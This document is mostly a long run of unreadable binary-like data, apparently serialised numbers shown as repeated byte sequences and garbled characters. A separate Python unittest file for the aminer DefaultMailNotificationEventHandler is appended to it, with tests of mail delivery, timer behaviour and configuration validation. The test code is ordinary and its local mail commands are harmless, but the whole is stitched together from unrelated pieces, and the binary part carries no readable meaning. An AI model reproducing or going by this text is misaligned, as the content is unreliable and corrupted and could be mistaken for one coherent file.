fq׿Rhh C\EU8鿔Rhh CSO`Rhh C DڿRhh C)uL?Rhh CJu?Rhh COm?Rhh C$8~?Rhh CP!8쿔Rhh C?Rhh Cʙ?Rhh C$ Q?Rhh C@DnJÿRhh CeQ?Rhh CEWG@?Rhh C` l?Rhh C$2US忔Rhh Co1տRhh Ctq[?Rhh C0 iV?Rhh CZ֢濔Rhh C꙱C5?Rhh C?Rhh C*4W@俔Rhh CPŽ'H?Rhh CX[8{ڿRhh CcRhh C`+b#?Rhh C$oZ#?Rhh C >`пRhh ChMRhh CP9'U?Rhh C>Rhh Cz(k?Rhh Cx-޿Rhh CMW?Rhh C?Rhh C[5?Rhh CnI??Rhh Ch C?WʿRhh CEc 濔Rhh Cvq2返Rhh C?Rhh Cpй?Rhh C>?Rhh C@dx3Rhh C`{?Rhh C?ARhh CoV9K返Rhh C0ͳRhh CF֝?Rhh Cn俔Rhh CV|:/⿔Rhh C/\ӿRhh C^`?Rhh C8^|?Rhh C4a9z"?Rhh C"^8 鿔Rhh CxM?Rhh CZ0ٿRhh C 'b 翔Rhh C,%Ԡ?Rhh CD#P?Rhh C™࿔Rhh C@P;̿Rhh C9Z ࿔Rhh Cd?Rhh C}\,'?Rhh C>?Rhh C$hRhh C֨ѿRhh CF8C濔Rhh CXmW?Rhh Cn&R?Rhh C˴X`޿Rhh Cݗz?Rhh Cx6X`返Rhh Ct b?Rhh CJE3?Rhh CXb#I?Rhh Ce?Rhh C⿔Rhh CȤ?Rhh C'h翔Rhh CT|鿔Rhh C`II ٿRhh CPi?Rhh C8O?Rhh CԹd w?Rhh CPQ(տRhh CI]SR?Rhh C>?Rhh C`~}>|XRhh CᢑݿRhh C r?Rhh C@E?Rhh C0lſRhh C{ =5Q返Rhh C!Rhh C?Rhh CF?Rhh C8*V?Rhh CC?Rhh Ctk?Rhh Cw@꿔Rhh Cȿθ?Rhh Cu ?Rhh CnZ8A?Rhh C j`PᅯRhh C>!j ؿRhh C >?Rhh C܁ y뿔Rhh CJ뿔Rhh Cd*F1+?Rhh C"?Rhh Cay-?Rhh C@'?Rhh C@?Rhh C0JY.ϿRhh C񈔲?Rhh C[KRhh Cۊ?\?Rhh C)!SKտRhh C*Q࿔Rhh C?hRhh C>?Rhh C]V?Rhh Cf\ 濔Rhh CU۩Rhh C^#?Rhh CgvܿRhh C5SSWsRhh CGϾ返Rhh C!J51Rhh C#޿Rhh CfCg߿Rhh C95࿔Rhh C@/.?Rhh Ct<޿Rhh C(e>?Rhh CЫT俔Rhh CbF)ٿRhh C>4꿔Rhh CcӿRhh CxvpS?Rhh Ch5QÿRhh CI返Rhh C rg?Rhh CC\xt߿Rhh C| |Z?Rhh CEM῔Rhh C KRhh CHZH˿Rhh C Vz?Rhh CJ-??Rhh CcJ#?Rhh CӮE?Rhh C>*?Rhh C4Dg?Rhh C4쿔Rhh Cmxz?Rhh Cܾ0U?Rhh C0O3˿Rhh C0]ІNFпRhh CUk忔Rhh Cup"?Rhh C|:𹿔Rhh Ck+翔Rhh CЭRҿRhh C8J^ݿRhh Cl>υRhh C`sിRhh Cm#Aj鿔Rhh C`bFVRhh C'?Rhh Ci 뿔Rhh C{,f?Rhh C|@w?Rhh CX8꿔Rhh C0{?Rhh C,T}i?Rhh 
CxFbʿRhh C>?Rhh CxB쿔Rhh Cx4m?Rhh C?Rhh Cђz?Rhh C;Eބ.?Rhh C*Rhh CѿRhh C%̏?Rhh Ch"?Rhh C ӽF?Rhh CdL>쿔Rhh CH> c/?Rhh CP6'?Rhh CUO࿔Rhh CЃUY?Rhh CT?Rhh C:q?Rhh C«4?Rhh CP@?Rhh C"/?Rhh C(A~㿔Rhh Cؚ&?Rhh CNN俔Rhh C0gGnN?Rhh C~=%쿔Rhh CпRhh CMM01࿔Rhh C_ ?Rhh C^?Rhh CU=ᅯRhh C@3HRhh C_*Rhh C?bA쿔Rhh C0C6Rhh C=OW?Rhh C:Z?Rhh CtP?Rhh Ct#G?Rhh CfA忔Rhh CǿiοRhh CT0Rhh CVB6;?Rhh Cܨb;?Rhh Cܒj쿔Rhh C>K?Rhh CտRhh C L@?Rhh C/_鿔Rhh C/:*?Rhh CJ 翔Rhh CXT.꿔Rhh C6}4:忔Rhh C@~?Rhh Cux4鿔Rhh C4S俔Rhh C*Q忔Rhh C /}?Rhh CP?Rhh C ͿRhh Cle?Rhh CʅZv?Rhh Cзy?Rhh Cǚ?Rhh C9:d߿Rhh C|k?Rhh C 13?Rhh CZ^?Rhh C#῔Rhh CAA}/ֿRhh C鯡ǿRhh CQ8?Rhh CۿRhh C2Zn޿Rhh C08R?Rhh Cc 뿔Rhh C`K忔Rhh C.=w`?Rhh CLi9?Rhh C^$1C?Rhh CBn返Rhh C(T5?Rhh CRhh C7X&?Rhh C Ҫj῔Rhh C8~ܿRhh CtۿRhh Cȑw,?Rhh ChsֿRhh CRhh C(iWP5ܿRhh COXcx?Rhh C0/?Rhh CҳWԦ?Rhh C6+ͼRhh C`-俔Rhh CZc?Rhh CXWM?Rhh C0"z2?Rhh C%s{1?Rhh CȰ0?Rhh CY/6 ׿Rhh Cb !?Rhh CO5῔Rhh C ->c9꿔Rhh C ~Tc?Rhh CԭMѿRhh Cp3MRhh CK]ɿRhh C*(?Rhh C4 ݣl?Rhh C\0hc뿔Rhh CN?Rhh C3s"?Rhh C`MuJ?Rhh CҪ a1?Rhh CtenֿRhh C\Z ?Rhh ChW?Rhh Ca;?Rhh C翔Rhh CEFRhh C0a0˿Rhh Cdb?Rhh Cx῔Rhh Cr*œh濔Rhh C|fW?Rhh C=࿔Rhh C-DxR` ?Rhh Ck ?Rhh CZRl?Rhh CN쿔Rhh CP~{k9?Rhh Cڮ^O?Rhh CLNEx?Rhh CxOP?Rhh C8{g?Rhh C+)?Rhh CD6 H?Rhh C,5jQ>'ܿRhh C;?Rhh C|<?Rhh CbXv?Rhh C4O?Rhh Ck*?Rhh C/?Rhh C1пRhh CƈI?Rhh C2返Rhh Cp俔Rhh C?Rhh C鿔Rhh CD @|?Rhh C-e_I࿔Rhh CYu?Rhh Cnrj2返Rhh CX3?Rhh Cf^翔Rhh CgoȿRhh CZpNRhh CUGWU8ӿRhh CL5쿴ۿRhh CV]⿔Rhh CLwO?Rhh CxaL῔Rhh CyxRhh C@+?Rhh C$4`,?Rhh CX dB鿔Rhh C%;꿔Rhh CTz?Rhh C5[t?Rhh C1俔Rhh Cߠ߿Rhh Cz?Rhh C\3?Rhh C2E㿔Rhh Ch݂KտRhh C[mؿRhh C{*?Rhh CFv?Rhh C`@?Rhh CТG返Rhh CpR?Rhh C@* qZRhh Czx?Rhh Ct 0?Rhh C$㿔Rhh C?Rhh C2X#忔Rhh CZ6H_?Rhh CϦտRhh C YjY?Rhh CԕcD?Rhh C悤gRhh C@XYF?Rhh C@yܱ?Rhh CD.S翔Rhh Cb^?Rhh C/zSRhh C0ʵ?Rhh Cx%?Rhh C(x㿔Rhh Cj5N?Rhh CNaW?Rhh C]+?ĿRhh C8鿔Rhh C(L9W߿Rhh C<]?Rhh C f?Rhh Cl{E?Rhh C {࿔Rhh C;)IG?Rhh Cz?Rhh Ck?Rhh C=`W޿Rhh Cp&翔Rhh C iR?Rhh C5+,@ݿRhh CpwνRhh CjƎM?Rhh C~ܕ$?Rhh CtN ?Rhh C1K.?Rhh C@W.WRhh C儳)ܿRhh Ch @?Rhh C@%Rhh C_ĿRhh C=7PҰRhh CDdA?Rhh CHY)ɿRhh CnPi\O?Rhh C3r3rRhh Cyo濔Rhh CQĒ俔Rhh 
CL^翔Rhh Cl?F?Rhh CM[gRhh Cm5CRhh CLܝ+?Rhh C _VsٿRhh CT|2c޿Rhh CY2 ݿRhh C[X?Rhh C{4?Rhh C|X 9?Rhh ClReH俔Rhh Cha?Rhh C8)'ҿRhh CdO ᅯRhh C#?Rhh C e,]¿Rhh C?Rhh CPc俔Rhh C.ϿRhh C8fI ӿRhh C3]?Rhh CdRhh CbZC1eRhh C2 ՊRhh CZ ?Rhh C?Rhh CZh)?Rhh CPBA?Rhh Ctn>ۿRhh CIA뿔Rhh CjᅯRhh Ck?Rhh CpyI?Rhh C ڴRhh C]e?Rhh CDT4忔Rhh CdM0?Rhh C=P?Rhh Cl|ԿRhh C,俔Rhh CxRhh C8ݛRhh C?Rhh C ?޿Rhh CH?Rhh C`ާ]޿Rhh CN?Rhh C.S?Rhh CP^J?Rhh Cs?(6?Rhh C Rhh CU?Rhh ChrbU?Rhh CY ?Rhh C(rϿRhh CCOq?Rhh CO4~?Rhh CX1޿Rhh CZ;b쿔Rhh Cpz俔Rhh C,)Py?Rhh Cdy?Rhh CbOl~?Rhh CxF?Rhh CF[⿔Rhh CLK?Rhh C0v=?Rhh CF6#=C?Rhh CSYRhh CZ0p|?Rhh C`|h?Rhh CNG0}ᅯRhh CB?Rhh C @࿔Rhh Cp\U?Rhh CyR?Rhh C(hz^?Rhh C-`k?Rhh CrW%?Rhh C@8dvԿRhh C@ 返Rhh CX7ED?Rhh C?Rhh Cp8m?Rhh C[;$濔Rhh C,mV{?Rhh Cb ?Rhh CF,0?Rhh C dؿRhh C8?Rhh C!:B濔Rhh Cև?%?Rhh C~2d쿔Rhh Cn Np⿔Rhh CT ߿Rhh Cs=cÿRhh C0C࿔Rhh C8J^濔Rhh Ci] ?Rhh C2ѻɫ?Rhh CƿRhh C4*5֖ݿRhh Cb o{翔Rhh C@,آRhh C87q?Rhh CPH[?Rhh C0̿?Rhh CTnٿRhh CZp$?Rhh C\俔Rhh C}пRhh C t6l?Rhh C'9ᅯRhh C(JG?Rhh C+t%y?Rhh Cm_~fRhh C䈣d12?Rhh CL&ؿRhh C&?Rhh C0[̊?Rhh Cŋ<ȋ?Rhh C5i鿔Rhh C~)tq?Rhh C1?Rhh C r]k ҿRhh CPJ4?Rhh CDJ?Rhh C"?Rhh C`#,?Rhh Cqi:?Rhh C!俔Rhh C܍k)Rhh C翔Rhh CU̳Rhh CXdst῔Rhh C${\ZZٿRhh Cp;Rhh CJGR?Rhh C{*OÿRhh Cp?Rhh ClKP?Rhh C>$jl?Rhh C)tR@?Rhh C[ᅯRhh C T?Rhh C`\hG?Rhh C y?Rhh CDÎ ?Rhh Cq,ᅯRhh C& Rhh C 6䡿Rhh CβO?Rhh Cs⿔Rhh C'F?Rhh CأpA?Rhh Cb{'࿔Rhh CdQ?Rhh CVz㿔Re](hh C,F|?Rhh C;=c?Rhh CF2ҿRhh CM ?Rhh CՐ"?Rhh C-DhJ?Rhh C=?Rhh CB返Rhh C.返Rhh CT#`??Rhh CP"?Rhh CL¾?Rhh CpӃ?Rhh CO?Rhh Cý>?Rhh C]eU꿔Rhh CtĚ4ԿRhh C0=p`?Rhh CF#p?Rhh C.EV?Rhh C@Z"?Rhh C VRhh C2#?Rhh Cj%0Da?Rhh CuY$?Rhh C@y+_Rhh CU^?Rhh CD|ͮ?Rhh C Ѯg9?Rhh CĐi?Rhh CൾԿRhh CZ+K?Rhh C,f?Rhh Cܧ ?Rhh C0xGaRhh CaRhh CLq῔Rhh CR;ZRhh C)'u?Rhh Cr O?Rhh Cx'?Rhh C8|(鿔Rhh Cy-ϲ?Rhh C M?Rhh C nRhh C]4Rhh C@Ϋ S!ۿRhh ChJٿRhh CQjǿRhh CQ?Rhh C`9R?Rhh CaG?Rhh Cv?Rhh Cn!<}_x?Rhh C Oi濔Rhh C F1wRhh CO8G?Rhh C;"翔Rhh C=eԿRhh CPm]Rhh Cf?Rhh C 0?Rhh C2x濔Rhh C, &꿔Rhh C4=zmy?Rhh C\1?Rhh C0"#K俔Rhh CH ?Rhh C&?Rhh C8yB俔Rhh CՔ?Rhh CJ=鿔Rhh Cp4?Rhh C:~LP࿔Rhh CP9DG쿔Rhh C@@l?Rhh C`20x?Rhh 
C8(?Rhh CEPJ?Rhh CCz?Rhh CQ?Rhh C@ܪ.?Rhh C`x(Rhh C5?Rhh Cw=[_?Rhh CVѵ俔Rhh C &6㿔Rhh C#R?Rhh C! ̿?Rhh C 5`nԿRhh C'ſRhh CH8dfhRhh C0P翔Rhh C0n`Z?Rhh C(;?Rhh C(p{?Rhh Cd ҿRhh CI߿Rhh C7'Y쿔Rhh C!xҿRhh Ch?Rhh CV' 翔Rhh C@DKݥRhh CgY *?Rhh C(?Rhh CGӂz?Rhh CPs?Rhh C^Y?Rhh C[jz?Rhh C ῔Rhh C O?Rhh Cx)ɿRhh C{t?Rhh C ύRhh C2d(W?Rhh CL濔Rhh Cy#ҿRhh Cb:'/X返Rhh C|nj?Rhh C,w첹῔Rhh C ^뿔Rhh C5?Rhh Ct$x?Rhh C@]ݨ?Rhh C: (aD濔Rhh C~NҔ[Rhh CnxRhh C?Rhh Cʿ0ѿRhh C()Q{?Rhh CqW?Rhh Cxԣ?Rhh Ctr?Rhh C;)?Rhh CDcͿRhh C@۴g7Rhh C@xа쿔Rhh C D)_˿Rhh CZu&쿔Rhh CkiRhh CL-?Rhh C@kx뿔Rhh C>Rhh CXZgXٿRhh Ch翔Rhh CpǭWѿRhh C(RݑR?Rhh Cd?Rhh C(@A@>?Rhh Cֵms?Rhh CPé0tӿRhh C id뿔Rhh C |q?Rhh C,f!^Rhh Cg?Rhh C>m?Rhh C!Lн?Rhh C匳4?Rhh C0뿔Rhh Cx­|뿔Rhh CUA¿Rhh C8(ԿRhh CύؿRhh CI'쿔Rhh C)=P쿔Rhh CD[$?Rhh CnSkS࿔Rhh Ct/俔Rhh C&c??Rhh CpqRt ?Rhh C{㿔Rhh CvX쿔Rhh C{VFʿRhh C0s?Rhh CoX;?Rhh C m{̿Rhh CVwJ?Rhh C0S1kĿRhh Cq!?Rhh CVYؿRhh C7㿔Rhh Cs6A?Rhh C<&?Rhh C`# ʻRhh C)Ղ鿔Rhh C:kqO?Rhh CZB?Rhh C|P?Rhh C3 뿔Rhh CRW忔Rhh CRhh COxd俔Rhh CZ2Ǧ?Rhh Cp返Rhh C/i<?Rhh CKԿRhh C~w,?Rhh CiԿRhh C3~{Rhh CY?Rhh C0>& ࿔Rhh C ⿔Rhh CRǿRhh CѿRhh CNοRhh CM-?Rhh CȒ忔Rhh C8nE?Rhh C[Y忔Rhh CL6?Rhh C :?Rhh Cd0⿔Rhh CbuRhh CWRhh C'~X$?Rhh Ckw?Rhh CH6?Rhh C ?Rhh C73u?Rhh C!*ܿRhh Cvj?Rhh C(nÿRhh CP^om 꿔Rhh CJ_b%?Rhh C=]?Rhh Cu)?Rhh C<'Y?Rhh Cڃ?HT?Rhh CX zfٿRhh C UP0?Rhh C/v?Rhh C2R?Rhh C}qRhh CvWϾRhh C`SՃLĿRhh CF>?Rhh CTM*ֿRhh C( QڬRhh CA%뿔Rhh C‚OP?Rhh C1b?Rhh CϣڿRhh C俔Rhh C%;}ۿRhh CCh?Rhh CCGB⿔Rhh C(G쿔Rhh C Rhh C0q?Rhh CL?Rhh Cb'ƿRhh C@rWB?Rhh Cv\m8 ῔Rhh CWЊ࿔Rhh CЄ?Rhh CP9'ʡ?Rhh C€.?Rhh C&TQ뿔Rhh CQ#+ڿRhh C^2 ?Rhh CD忔Rhh C>\Ȝ翔Rhh Cpk ?Rhh C|?Rhh C g?Rhh C d:F?Rhh C1?Rhh CW@??Rhh CAڵ翔Rhh Cx4ʿRhh C@r׿Rhh CnBѢʿRhh Cg6OH?Rhh C뿔Rhh Cp  Rhh C<̍Q?Rhh CP"?Rhh CqE Q?Rhh CDFӿRhh C(+#?Rhh C y~Rhh CPi3^?Rhh C2wX1꿔Rhh C@QUwRhh C?Rhh C~đ返Rhh CzC?Rhh CmH2?Rhh C:B?Rhh C5.?Rhh Cp B[?Rhh CMKÿRhh C00CÿRhh C|ۓK]?Rhh C"UCG俔Rhh C. 
ͿRhh CX^ !ӿRhh Cfo\?Rhh CI7῔Rhh C\0` 翔Rhh CG837?Rhh C=ſRhh C`E ?Rhh Ctb~nۿRhh C֣?Rhh CLYֿRhh C&t?Rhh Cdo5#TֿRhh Ccߞ뿔Rhh Cj:huܿRhh CJ-ᅯRhh CX$o?Rhh C4I?Rhh Cs2&?Rhh CC&?Rhh C7:Rhh C8῔Rhh C20+ 忔Rhh C"Rhh C!>ԿRhh C0-鿔Rhh CIW?Rhh C|bЗ࿔Rhh C̩(R?Rhh CHv}>OVƿRhh CSSI2?Rhh CUKR?Rhh C0'ĩ?Rhh C(.?Rhh CbyпRhh C՞Rhh CˆFRhh C@TQRhh CP<ⅹRhh CN1oq?Rhh Ck2v?Rhh C,&?Rhh CN?Rhh CB῔Rhh C?Rhh C »aѿRhh C@j:0%i?Rhh CHd'?Rhh CssᅯRhh Cvܤ?Rhh CbxTпRhh C?Rhh CrNP꿔Rhh C ֞?Rhh C}NKٿRhh CֿRhh CtᅯRhh CfT?Rhh C 熍ؿRhh C "dĿRhh Cg_[?Rhh C@҄v"Rhh C:X-㿔Rhh CbÿRhh C$%l~G῔Rhh C ?Rhh C“Lf޿Rhh C@QRk翔Rhh CY?Rhh Cdo4?Rhh CyW̘?Rhh Cܗ6W~࿔Rhh Cߨ?Rhh C ) ӿRhh CdGE|?Rhh CJ鿔Rhh CzV@QȿRhh CqٿRhh C޿Rhh C9?Rhh CKRhh CpZm?Rhh C 8N?Rhh C kB̿Rhh ClV鿔Rhh Cr`G?Rhh C]S?Rhh Cv?Rhh C="?Rhh Cq^?Rhh C\>忔Rhh CFɦ?Rhh C׿Rhh CKiοRhh Cn}˿Rhh Cu][|?Rhh CT"2ѿRhh C*I_K?Rhh C-á?Rhh Cƺk:?Rhh C œ?Rhh C * 鿔Rhh CH?Rhh CN3Ӟ?Rhh CXz9?Rhh C2Ɇ ᅯRhh C;Ê?Rhh C7z?Rhh CPE?Rhh C0/݊?Rhh CD<l?Rhh C(4ؿRhh C`5ӱ?Rhh CƠRhh C8x 꿔Rhh C,)`fRhh C 'i-sݿRhh C  ?Rhh CWO鿔Rhh C3?Rhh Cwq?Rhh Cڱz?Rhh CT@={?Rhh CVcj꿔Rhh C8h ?Rhh C}ߡRhh Cr:?Rhh C( 꿔Rhh CI ?Rhh C_ycؿRhh C3&9_^忔Rhh Cxٰ?Rhh Cv ?$?Rhh CF=ݷL뿔Rhh CL܎I꿔Rhh CTqRhh CW῔Rhh Cj?Rhh C4OֿRhh CzM;?Rhh C@?Rhh CX?Rhh CO;?Rhh CȖۊ翔Rhh C0jRhh Cp?Rhh C$ M忔Rhh Cpu?Rhh C[wn̿Rhh C'ؤ?Rhh CZQRhh C4俔Rhh C\;ٝؿRhh C@W?Rhh C'ݿRhh CRi꿔Rhh CL\{ҿRhh Cڜ㿔Rhh C}WRhh CXdg/[˿Rhh C!mRhh Cj?Rhh C:L"㿔Rhh Cp0?Rhh C?Rhh C|X9?|ҿRhh Cn.[쿔Rhh C}k㿔Rhh CR obk濔Rhh C*i^⿔Rhh C^=꿔Rhh CΧebRhh CH|r?Rhh C` ?Rhh C忔Rhh C0`?Rhh CC%j?Rhh Cd?Rhh C Y-[ɿRhh C$g#`?Rhh C} 鿔Rhh CC?Rhh Cf(쿔Rhh Cc1S⿔Rhh C?Rhh CdMD?Rhh C-ji?Rhh CBeM?Rhh CxWᅯRhh CK/ZؿRhh CH?Rhh Cཱྀ !¿Rhh CS.\,?Rhh C@\?Rhh C4 =[῔Rhh C,zN?Rhh C`8mRhh CU?Rhh C8k]?Rhh C~j?Rhh CB@GCᅯRhh Ci0 ǿRhh C%T翔Rhh C^W?Rhh Cv?Rhh C6(+&ҿRhh CuC!?Rhh C^yM?Rhh Cڭp*?Rhh CV5!5?Rhh Cϩ?Rhh Cb⨸/꿔Rhh CI!R$?Rhh CY옣s߿Rhh CN1`!返Rhh C@;?Rhh CH čǁ?Rhh CDfZq?Rhh Ce4>AᅯRhh CA%=?Rhh C :W俔Rhh C~4ݿRhh CUvk?Rhh Ch ?Rhh C8?Rhh C4r࿔Rhh CxV쿔Rhh CN?Rhh CШW쿔Rhh C G8!?Rhh C9ƒRhh CRn?Rhh C,ڹ?Rhh Cլp#?Rhh C5r~V?Rhh CHq_?Rhh Cx!ͿRhh C\ =࿔Rhh 
C" ?Rhh C_?Rhh CPˏ]*Rhh CDGB?Rhh CN*?Rhh CU2鿔Rhh C oȿRhh C0zaٿRhh C87?Rhh C^o4뿔Rhh CT3P㿔Rhh C翔Rhh CM@返Rhh C@Rn#?Rhh C6 忔Rhh CB0뿔Rhh CH3IBB ?Rhh C4S;U|?Rhh CjM㰿Rhh ChreݿRhh C}F㿔Rhh Cq9BͿRhh CX[?Rhh C(NMoK?Rhh C4 9Ŏ꿔Rhh Cl b῔Rhh C=+?Rhh C ?ϣ??Rhh C`k|Rhh C WؿRhh CSQRhh CKȴb?Rhh C夑?Rhh C|HӮ,ڿRhh C@?Rhh Cp\m?Rhh CHۿRhh CОrt濔Rhh CBV?Rhh CsdE?Rhh CLZJz῔Rhh CpURhh Cxf㿔Rhh CG返Rhh CVʏ?Rhh CX.q?Rhh C0- E?Rhh C@qH?Rhh Ch'?Rhh C5Ӄ$?Rhh CY)Rhh C|?Rhh C1 ysRhh C@['Rhh Ch|2@?Rhh CPQjRhh Cob/9Rhh C4z?Rhh C`cٿRhh CS8g׿Rhh Cb|X?Rhh C mVRhh CչtURhh CU6\ӿRhh C `?Rhh CH<-?Rhh CRhh CQ-?Rhh CY;eٿRhh Cpg!տRhh C Rhh CtO%r߿Rhh Cu?Rhh C z?Rhh CsοRhh C X"Rhh C&էD?Rhh Cq08Rhh C4`%?Rhh C>4῔Rhh Cʰ+?Rhh Cl?Rhh CeW俔Rhh C.`x5?Rhh C.eᅯRhh CH ̿Rhh Ct;q忔Rhh CbEӿRhh Cd?Rhh C0&ܿRhh C7JmѿRhh C@r (?Rhh C<?Rhh CWF.@+ᅯRhh CJӾ0w?Rhh CPQWfѿRhh C8[ ?Rhh C,Rhh CBylh?Rhh CRtտRhh CV"p?Rhh CP+N ?Rhh CLLZ?Rhh Cn˜?Rhh Cft9Rhh Cv/??Rhh Cc࿔Rhh CJxT῔Rhh C(%5 㿔Rhh CDC㿔Rhh Ch_{kEͿRhh C(oê?Rhh C2g߿Rhh C& ˞YRhh CRhh CL亿Rhh CRRhh C?r"?Rhh Ckp?Rhh Cn#?Rhh CTq塞Rhh C`,|Rhh CB?Rhh Cز$[$ȿRhh C5I?Rhh C?Rhh Ca8忔Rhh CH\?Rhh C?O쿔Rhh Cy?Rhh CP뿔Rhh C,ſRhh C,O῔Rhh C ٿRhh CBQ?Rhh CHa v?Rhh C٬^ͿRhh Cr?Rhh C:`dRhh C%{0?ᅯRhh CPHL?Rhh CFp)k?Rhh C sѿRhh C\УdտRhh CR) 1返Rhh C ]õpѿRhh C8Z忔Rhh Ct|F=?Rhh CNN῔Rhh Cp¿Rhh C0]l?Rhh CӸh꿔Rhh C*&?Rhh C"Ka?Rhh C t51?Rhh Cp?Rhh CRrDB?Rhh Cfd=Rhh CXR忔Rhh C(G27?Rhh CzČ9?Rhh CXEy=?Rhh CyC 㿔Rhh C:oRhh Ci쿔Rhh CE?Rhh Cד 0ؿRhh CլݿRhh C47_eҿRhh C/0#Fi返Rhh C=b?Rhh C~鼿Rhh C? 
import unittest
import sys
import subprocess
from time import time, sleep
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler
from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext
from datetime import datetime


class DefaultMailNotificationEventHandlerTest(TestBase):
    """Unittests for the DefaultMailNotificationEventHandler.

    The tests feed events into the handler and then read the local mailbox back through
    the ``mail`` command, so a working local mail setup is required to run them.
    """

    # Template of one mailed notification: timestamp prefix, affected paths, value,
    # detector class and description, line count and the raw log lines.
    __expected_string = '%s New value for paths %s: %s\n%s: "%s" (%d lines)\n %s'
    # Shell commands that print and that delete the mailbox queried via `mail -u mail`.
    mail_call = "echo p | mail -u mail"
    mail_delete_call = "echo d | mail -u mail"
    pid = b" pid="
    test = "Test.%s"
    dtf = "%Y-%m-%d %H:%M:%S"

    def _mailbox(self, purge):
        """Run ``mail_call`` and return its stdout decoded as UTF-8.

        @param purge when True, ``mail_delete_call`` is executed right after printing so the
        following test step starts from an empty mailbox.
        """
        listing = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE)
        if purge:
            subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE)
        return str(listing.stdout, "utf-8")

    def test1receive_event(self):
        """
        Receive several events before a mail is sent to root@localhost.
        Make sure no mail notifications are in /var/spool/mail/root before running this test.
        After each delivery the test waits briefly so that the mail can be read back.
        """
        description = "Test1DefaultMailNotificationEventHandler"
        context = DummyMatchContext(self.pid)
        element_s1 = DummyFixedDataModelElement("s1", self.pid)
        match = element_s1.get_match_element("match", context)
        handler = DefaultMailNotificationEventHandler(self.analysis_context)
        self.analysis_context.register_component(self, description)
        source = self.test % self.__class__.__name__
        message = "New value for paths %s, %s: %s" % ("match/s1", "match/s2", repr(match.match_object))

        def send(atom):
            # Every delivery carries the same two raw lines of the given atom.
            return handler.receive_event(source, message, [atom.raw_data, atom.raw_data], None, atom, self)

        first_ts = time()
        atom = LogAtom(element_s1.data, ParserMatch(match), first_ts, self)
        send(atom)
        second_ts = first_ts + 600
        atom = LogAtom(element_s1.data, ParserMatch(match), second_ts, self)
        # set the next_alert_time instead of sleeping 10 seconds
        handler.next_alert_time = time()
        send(atom)
        sleep(1)
        mailbox = self._mailbox(True)
        body = self.__expected_string % ("", "match/s1, match/s2", "b' pid='", self.__class__.__name__, description, 2, " pid=\n pid=")
        exp1 = datetime.fromtimestamp(first_ts).strftime(self.dtf) + body
        exp2 = datetime.fromtimestamp(second_ts).strftime(self.dtf) + body
        self.assertTrue(exp1 + "\n" + exp2 + "\n\n" in mailbox, msg="%s vs \n %s" % (exp1 + "\n\n", mailbox))

        # test output_event_handlers
        self.output_event_handlers = []
        handler.next_alert_time = time()
        self.assertTrue(send(atom))
        sleep(1)
        self.assertTrue("0 messages" in self._mailbox(False))

        self.output_event_handlers = [handler]
        handler.next_alert_time = time()
        self.assertTrue(send(atom))
        sleep(1)
        self.assertTrue(exp2 in self._mailbox(True))

        # test suppress detector list
        self.output_event_handlers = None
        self.analysis_context.suppress_detector_list = [description]
        handler.next_alert_time = time()
        self.assertTrue(send(atom))
        sleep(2)
        self.assertTrue("0 messages" in self._mailbox(False))

        self.output_event_handlers = [handler]
        self.analysis_context.suppress_detector_list = []
        handler.next_alert_time = time()
        self.assertTrue(send(atom))
        sleep(1)
        self.assertTrue(exp2 in self._mailbox(True))

    def test2do_timer(self):
        """
        Test the timer: a collected event is only mailed by do_timer once next_alert_time is reached.
        The eventCollectTime must not be 0.
        """
        description = "Test2DefaultMailNotificationEventHandler"
        handler = DefaultMailNotificationEventHandler(self.analysis_context)
        self.analysis_context.register_component(self, description)
        now = time()
        context = DummyMatchContext(self.pid)
        element_s3 = DummyFixedDataModelElement("s3", self.pid)
        match = element_s3.get_match_element("match", context)
        atom = LogAtom(element_s3.data, ParserMatch(match), now, self)
        handler.receive_event(self.test % self.__class__.__name__, "New value for paths %s: %s" % ("match/s3", repr(match.match_object)), [atom.raw_data], None, atom, self)
        body = self.__expected_string % ("", "match/s3", "b' pid='", self.__class__.__name__, description, 1, " pid=") + "\n\n"

        # a timer tick at time 0 must not deliver anything
        handler.do_timer(0)
        exp_at_zero = datetime.fromtimestamp(0).strftime(self.dtf) + body
        self.assertFalse(exp_at_zero in self._mailbox(False))

        # alert time still 500 seconds in the future: nothing delivered either
        now = time()
        handler.next_alert_time = now + 500
        handler.do_timer(now)
        exp_now = datetime.fromtimestamp(now).strftime(self.dtf) + body
        self.assertFalse(exp_now in self._mailbox(False))

        # alert time reached: the collected event is mailed
        handler.next_alert_time = now
        handler.do_timer(now)
        sleep(2)
        self.assertTrue(exp_now in self._mailbox(True))

    def test3validate_parameters(self):
        """Test all initialization parameters for the event handler. Input parameters must be validated in the class."""
        d = DefaultMailNotificationEventHandler
        ac = self.analysis_context
        acp = ac.aminer_config.config_properties
        # values that are no number at all; each numeric option has to reject every one of them with TypeError
        non_numeric = (True, ["Default"], {"id": "Default"}, (), set(), "", b"", None)

        def rejects(key, values, error):
            # Store each value under the config key and expect the constructor to raise `error`.
            for value in values:
                acp[key] = value
                self.assertRaises(error, d, ac)

        def accepts(key, values):
            # Store each value under the config key and expect construction to succeed.
            for value in values:
                acp[key] = value
                d(ac)

        acp[d.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "test123@gmail.com"
        acp[d.CONFIG_KEY_MAIL_FROM_ADDRESS] = "test123@gmail.com"
        acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = "test prefix"
        acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = 0
        acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = 0
        acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 0
        acp[d.CONFIG_KEY_ALERT_MAX_GAP] = 600
        acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = 1
        d(ac)

        # the subject prefix has to be a string; the empty string is allowed
        rejects(d.CONFIG_KEY_MAIL_SUBJECT_PREFIX, (True, 123, 123.3, {"id": "Default"}, (), set(), b"", ["Default"], None), TypeError)
        accepts(d.CONFIG_KEY_MAIL_SUBJECT_PREFIX, ("",))

        # non-negative numbers (int or float) for the three time options
        for key in (d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME, d.CONFIG_KEY_EVENT_COLLECT_TIME, d.CONFIG_KEY_ALERT_MIN_GAP):
            rejects(key, non_numeric, TypeError)
            rejects(key, (-1,), ValueError)
            accepts(key, (123, 123.3))

